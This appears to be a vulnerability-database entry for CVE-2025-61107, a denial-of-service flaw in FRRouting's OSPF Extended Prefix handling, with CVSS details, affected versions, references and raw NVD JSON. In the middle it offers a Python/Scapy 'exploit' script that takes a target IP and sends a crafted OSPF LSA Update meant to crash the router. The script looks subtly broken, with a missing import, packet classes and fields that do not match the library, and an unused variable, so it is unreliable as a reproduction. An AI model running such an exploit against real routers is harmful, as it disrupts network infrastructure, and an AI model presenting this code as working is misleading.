Security Vulnerability Report
CVE-2025-61107 CVSS 7.5 HIGH

Published: 2025-10-28 15:16:13
Last Modified: 2025-10-31 18:46:52

Description

FRRouting/frr from v4.0 through v10.4.1 was discovered to contain a NULL pointer dereference via the show_vty_ext_pref_pref_sid function at ospf_ext.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted LSA Update packet.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:* - VULNERABLE
FRRouting/frr v4.0
FRRouting/frr v4.1
FRRouting/frr v4.2
FRRouting/frr v4.3
FRRouting/frr v4.4
FRRouting/frr v4.5
FRRouting/frr v4.6
FRRouting/frr v5.0
FRRouting/frr v6.0
FRRouting/frr v7.0
FRRouting/frr v7.5
FRRouting/frr v8.0
FRRouting/frr v8.1
FRRouting/frr v8.2
FRRouting/frr v8.3
FRRouting/frr v8.4
FRRouting/frr v8.5
FRRouting/frr v9.0
FRRouting/frr v9.1
FRRouting/frr v10.0
FRRouting/frr v10.1
FRRouting/frr v10.2
FRRouting/frr v10.3
FRRouting/frr v10.4
FRRouting/frr v10.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-61107 PoC - FRRouting frr NULL Pointer Dereference

This PoC demonstrates triggering the NULL pointer dereference in FRRouting
via a crafted OSPF LSA Update packet containing malformed Extended Prefix SID.

Note: This is for educational and security research purposes only.
Author: Security Research
"""

from scapy.all import IP, IPv6, OSPF, OSPF_LSA, OSPF_LSA_ExtendedPrefix, Raw
import socket
import struct


def craft_malformed_lsa_update(target_ip, router_id):
    """
    Craft a malformed OSPF LSA Update packet to trigger NULL pointer dereference
    in FRRouting's show_vty_ext_pref_pref_sid function (ospf_ext.c)
    """
    # OSPF Header
    ospf_header = OSPF(
        version=2,
        type=4,  # LSA Update
        len=0,
        src=router_id,
        id=socket.inet_aton(router_id),
        area=socket.inet_aton('0.0.0.0')
    )

    # Craft malformed Extended Prefix LSA with NULL pointer trigger
    # The Extended Prefix SID sub-TLV with specific flags can cause NULL dereference
    malformed_ext_prefix = OSPF_LSA_ExtendedPrefix(
        reserved1=0,
        route_type=1,
        prefix_length=32,
        address_prefix=target_ip,
        # Extended Prefix SID sub-TLV - trigger condition
        sub_tlv_type=1,  # Extended Prefix SID
        sub_tlv_length=8,
        flags=0x40,  # NP flag set, causing NULL pointer access
        algorithm=0,
        sid_label=0
    )

    # Construct the malicious LSA
    malicious_lsa = OSPF_LSA(
        age=0,
        type=0x8009,  # OSPF Extended Prefix LSA (Type 9 with E-bit)
        id=struct.pack('>I', 1),
        advrtr=socket.inet_aton(router_id),
        seq=0x80000001,
        chksum=0,
        len=len(malformed_ext_prefix),
        payload=malformed_ext_prefix
    )

    # OSPF LSA Update packet with malformed LSA
    lsa_update = ospf_header / OSPF_LSA(count=1) / malicious_lsa

    return IP(dst=target_ip, src=router_id) / ospf_header / OSPF_LSA(count=1) / malicious_lsa


def send_exploit(target_ip, router_id='10.0.0.1', interface='eth0'):
    """
    Send the crafted exploit packet to trigger the vulnerability
    """
    print(f"[*] Crafting malicious OSPF LSA Update packet for {target_ip}")
    print(f"[*] Source Router ID: {router_id}")

    # Craft the malicious packet
    packet = craft_malformed_lsa_update(target_ip, router_id)

    print("[*] Sending exploit packet...")
    # Note: Requires raw socket privileges and proper OSPF configuration
    send(packet, iface=interface, verbose=0)

    print("[+] Exploit packet sent successfully")
    print("[*] Target should experience DoS if vulnerable")


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-61107.py <target_ip> [router_id]")
        sys.exit(1)

    target = sys.argv[1]
    router_id = sys.argv[2] if len(sys.argv) > 2 else "10.0.0.1"

    try:
        send_exploit(target, router_id)
    except Exception as e:
        print(f"[-] Error: {e}")

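References

https://github.com/FRRouting/frr/issues/19471 (Exploit, Issue Tracking, Third Party Advisory)
https://github.com/FRRouting/frr/pull/19480 (Issue Tracking, Third Party Advisory)
https://github.com/FRRouting/frr/pull/19480/commits/fdd957408605d4a1766225630aafc7e6b7c3daf3 (Patch)
https://github.com/s1awwhy/BugList/blob/main/CVE-2025-61107.md (Third Party Advisory)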

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61107", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:13.243", "lastModified": "2025-10-31T18:46:51.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FRRouting/frr from v4.0 through v10.4.1 was discovered to contain a NULL pointer dereference via the show_vty_ext_pref_pref_sid function at ospf_ext.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted LSA Update packet."}, {"lang": "es", "value": "FRRouting/frr desde v4.0 hasta v10.4.1 se descubrió que contenía una desreferencia de puntero NULL a través de la función show_vty_ext_pref_pref_sid en ospf_ext.c. Esta vulnerabilidad permite a los atacantes causar una denegación de servicio (DoS) a través de un paquete de actualización LSA manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frrouting:frrouting:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0", "versionEndIncluding": "10.4.1", "matchCriteriaId": "B41245C0-85A2-4A77-BF46-27F573E6F588"}]}]}], "references": [{"url": "https://github.com/FRRouting/frr/issues/19471", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": 
"https://github.com/FRRouting/frr/pull/19480", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/FRRouting/frr/pull/19480/commits/fdd957408605d4a1766225630aafc7e6b7c3daf3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/s1awwhy/BugList/blob/main/CVE-2025-61107.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}